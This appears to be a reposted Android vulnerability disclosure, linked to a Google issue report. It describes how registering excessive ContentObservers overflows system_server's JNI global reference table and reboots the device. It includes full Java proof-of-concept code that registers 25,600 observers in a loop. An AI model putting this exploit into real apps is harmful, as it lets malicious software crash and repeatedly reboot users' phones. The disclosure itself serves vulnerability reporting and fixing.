demo 地址
https://github.com/SundayCool/JNIoverflow
https://issuetracker.google.com/issues/117744552
When the malicious code in an APP to register too many ContentObserver, it will make system_server creates many Binder Proxy objects and JNI Glocal Reference objects which will lead to JNI global reference table overflow that makes system reboots.
Just as the code bellow, when the method onClick called in Line 32, system will reboot of JNI Error.
The log and demo code are attached.
1 public class MainActivity extends ActionBarActivity
2 implements OnClickListener{
3
4 class SettingsObserver extends ContentObserver {
5 SettingsObserver(Handler handler) {
6 super(handler);
7 }
8
9 void observe() {
10 ContentResolver resolver = getContentResolver();
11 resolver.registerContentObserver(
12 Settings.System.getUriFor(Settings.System.ALARM_ALERT), false, this );
13
14 updateSettings();
15 }
16 @Override
17 public void onChange(boolean selfChange) {
18 updateSettings();
19 }
20
21 @Override
22 protected void finalize() throws Throwable {
23 getContentResolver().unregisterContentObserver(this);
24 // TODO Auto-generated method stub
25 super.finalize();
26 }
27 }
28
29 public void updateSettings() {
30 }
31
32 public void onClick(View src)
33 {
34 try {
35 new Thread() {
36 @Override
37 public void run(){
38 for (int i = 0; i < 25600; i++) {
39 SettingsObserver observer = new SettingsObserver(null);
40 observer.observe();
41 }
42 }
43 }.start();
44
45 } catch (Exception e) {
46 // TODO: handle exception
47 }
48
49
50 }
51
当恶意代码在一个应用程序中注册过多的ContentObserver时,会导致system_server创建大量的BinderProxy对象和JNI全局引用对象,从而引起JNI全局引用表溢出,最终使系统重启。此问题在特定条件下触发,详细代码及日志已附。
1845

被折叠的 条评论
为什么被折叠?



